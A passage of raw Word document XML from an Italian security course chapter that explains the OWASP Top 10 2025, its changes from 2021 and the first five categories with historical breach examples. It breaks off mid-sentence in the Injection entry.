            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Configurazione di sicurezza errata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A03:2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Software Supply Chain Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fallimenti della catena di approvvigionamento software</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04:2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fallimenti crittografici</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A05:2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Iniezione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A06:2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Progettazione insicura</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A07:2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fallimenti dell’autenticazione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A08:2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Software or Data Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fallimenti di integrità di software o dati</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09:2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Logging &amp; Alerting Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fallimenti di registrazione e allarmistica di sicurezza</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A10:2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mishandling of Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Gestione errata delle condizioni eccezionali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:id="181" w:name="cosa-è-cambiato-rispetto-alla-2021"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa è cambiato rispetto alla 2021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La 2025 ha portato cambiamenti significativi rispetto alla 2021:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Due nuove categorie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: A03 (Software Supply Chain Failures, espansione di una categoria pre-esistente) e A10 (Mishandling of Exceptional Conditions, completamente nuova).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Una consolidazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la vecchia A10:2021 (Server-Side Request Forgery, SSRF) è stata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">assorbita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in A01:2025 (Broken Access Control). OWASP ha riconosciuto che SSRF è essenzialmente un caso particolare di controllo degli accessi rotto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Riordino delle posizioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: A02:2025 Security Misconfiguration è salita drasticamente dal 5° al 2° posto. Cryptographic Failures è scesa dal 2° al 4°. Injection è scesa dal 3° al 5°.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’elemento più importante:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A01 Broken Access Control resta al primo posto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Era #1 nel 2017, lo era nel 2021, lo è ancora nel 2025. Otto anni in cima alla classifica significa che il problema è strutturale, non risolvibile con un singolo strumento.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">È l’argomento del nostro </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, e la posizione costante ti dice perché.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="181"/>
    <w:bookmarkEnd w:id="182"/>
    <w:bookmarkStart w:id="193" w:name="le-10-voci-spiegate"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="489" w:name="sec_4_4"/>
      <w:r>
        <w:t xml:space="preserve">4.4 Le 10 voci spiegate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="489"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vediamo ciascuna voce in modo conciso. Non ti aspettare di capirle tutte a fondo adesso: alcune (le 5 principali per noi) le tratteremo per esteso nei capitoli successivi.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="183" w:name="Xd39110be219948cc608f43c17ff6ba5f8ff906e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A01:2025 — Broken Access Control (controllo degli accessi rotto)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un utente è in grado di compiere operazioni o accedere a risorse che non gli sono autorizzate. Esempi: cambiare un numero nell’URL e vedere i dati di un altro utente (IDOR), modificare un parametro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?ruolo=admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, accedere a un endpoint amministrativo senza essere amministratori, leggere file del server attraverso un servizio mal protetto (SSRF).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio reale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nel 2019, una vulnerabilità in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">First American Financial Corp.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ha esposto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">885 milioni di documenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(atti notarili, dichiarazioni dei redditi, scansioni di carte d’identità) cambiando un semplice numero nell’URL. Nessuna autenticazione, nessuna autorizzazione: chiunque poteva navigare i documenti di chiunque altro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dove nel corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> — IDOR e Broken Access Control.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">È uno dei due capitoli più importanti.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="183"/>
    <w:bookmarkStart w:id="184" w:name="X0994bbdcd155ea6989345b6ad274a914be02479"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A02:2025 — Security Misconfiguration (configurazione di sicurezza errata)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le impostazioni del sistema, del framework, del cloud o dell’applicazione lasciano scoperte parti che dovrebbero essere protette. Esempi: account di default mai cambiati (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), endpoint di debug attivi in produzione, bucket cloud lasciati pubblici, header HTTP di sicurezza assenti, messaggi di errore che rivelano informazioni interne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio reale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Decine di breach pubblicati ogni mese coinvolgono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bucket Amazon S3 lasciati pubblici per errore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: dati medici, archivi di videosorveglianza, anagrafiche di clienti. Spesso lo sviluppatore non ha sbagliato il codice — ha sbagliato la configurazione del cloud.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dove nel corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cenni nei capitoli 7 (configurazione del database, segreti) e 8 (header HTTP di sicurezza). Una trattazione completa è materia di moduli avanzati di amministrazione di sistema.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="184"/>
    <w:bookmarkStart w:id="185" w:name="X0eb230583868a988a8fc1f5ace14ed5b7551da6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A03:2025 — Software Supply Chain Failures (fallimenti della catena di approvvigionamento)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vulnerabilità o compromissioni che entrano nel tuo software attraverso le sue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dipendenze</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(librerie open source, framework, plugin, immagini Docker), i suoi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">strumenti di build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(CI/CD, package manager) o i suoi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">canali di distribuzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Espansione della vecchia categoria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable and Outdated Components</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: oggi non basta più aggiornare le librerie con CVE noti, bisogna anche garantire che la pipeline di build non sia compromessa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio reale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A marzo 2024,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">XZ Utils</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— una libreria di compressione presente in praticamente ogni distribuzione Linux — è stata trovata compromessa con una backdoor inserita pazientemente da un contributore malevolo nell’arco di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">due anni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La vulnerabilità (CVE-2024-3094, CVSS 10.0) è stata scoperta per fortuna prima che la versione compromessa entrasse nelle release stabili dei principali sistemi operativi. Sarebbe potuto essere il più grande disastro di sicurezza della storia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dove nel corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> — Supply Chain.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="185"/>
    <w:bookmarkStart w:id="186" w:name="X7f35fdec116ed315a115506ccde90b720225699"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A04:2025 — Cryptographic Failures (fallimenti crittografici)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mancato uso della crittografia dove servirebbe, uso di algoritmi obsoleti (MD5, SHA-1, DES), gestione errata delle chiavi, password salvate in chiaro o hashate male, dati sensibili non cifrati a riposo o in transito.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio reale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nel 2012,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">LinkedIn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ha subito un breach:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">117 milioni di password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono state esposte. Erano memorizzate hashate con SHA-1 senza salt — un metodo già considerato debole all’epoca. Migliaia di password sono state decifrate in pochi minuti dai gruppi di attaccanti che si sono passati il dump.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dove nel corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> — Password e crittografia.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="186"/>
    <w:bookmarkStart w:id="187" w:name="a052025-injection-iniezione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A05:2025 — Injection (iniezione)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L’utente riesce a far interpretare al sistema dati che dovrebbero essere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">valori</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come se fossero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
